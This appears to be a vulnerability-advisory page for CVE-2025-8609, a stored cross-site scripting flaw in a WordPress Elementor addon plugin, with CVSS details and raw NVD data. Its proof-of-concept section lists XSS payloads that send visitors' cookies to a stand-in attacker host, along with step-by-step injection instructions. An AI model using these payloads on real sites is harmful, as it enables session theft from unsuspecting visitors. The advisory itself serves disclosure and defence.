Security Vulnerability Report
中文
CVE-2025-8609 CVSS 6.4 MEDIUM

CVE-2025-8609

Published: 2025-11-18 09:15:54
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The RTMKit Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Accordion Block's attributes in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

RTMKit Addons for Elementor (rometheme-for-elementor) ≤ 1.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-8609 PoC - Stored XSS in RTMKit Addons for Elementor Accordion Block --> <!-- Attack requires Contributor-level access or higher in WordPress --> <!-- Method 1: Using img tag with onerror event --> <img src=x onerror="fetch('https://attacker.com/log?cookie='+document.cookie)"> <!-- Method 2: Using SVG element --> <svg/onload=fetch('https://attacker.com/steal?data='+btoa(document.cookie))> <!-- Method 3: Using script tag --> <script>new Image().src='https://attacker.com/log?c='+document.cookie;</script> <!-- Method 4: Using body onload event --> <body onload="document.location='https://attacker.com/redirect?url='+window.location.href"> <!-- Exploitation Steps: --> <!-- 1. Login to WordPress with Contributor+ account --> <!-- 2. Create/edit a page with Elementor --> <!-- 3. Add RTMKit Accordion Block widget --> <!-- 4. Inject XSS payload in Accordion title or content fields --> <!-- 5. Publish/update the page --> <!-- 6. Any user visiting the page will execute the malicious script -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8609", "sourceIdentifier": "[email protected]", "published": "2025-11-18T09:15:53.647", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The RTMKit Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Accordion Block's attributes in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/rometheme-for-elementor/trunk/widgets/rkit_widgets/rkit_image_accordion.php#L1032", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3369481/rometheme-for-elementor/trunk/widgets/rkit_widgets/rkit_image_accordion.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a4601d9e-02bb-4b27-b16e-7cfc0fc19919?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.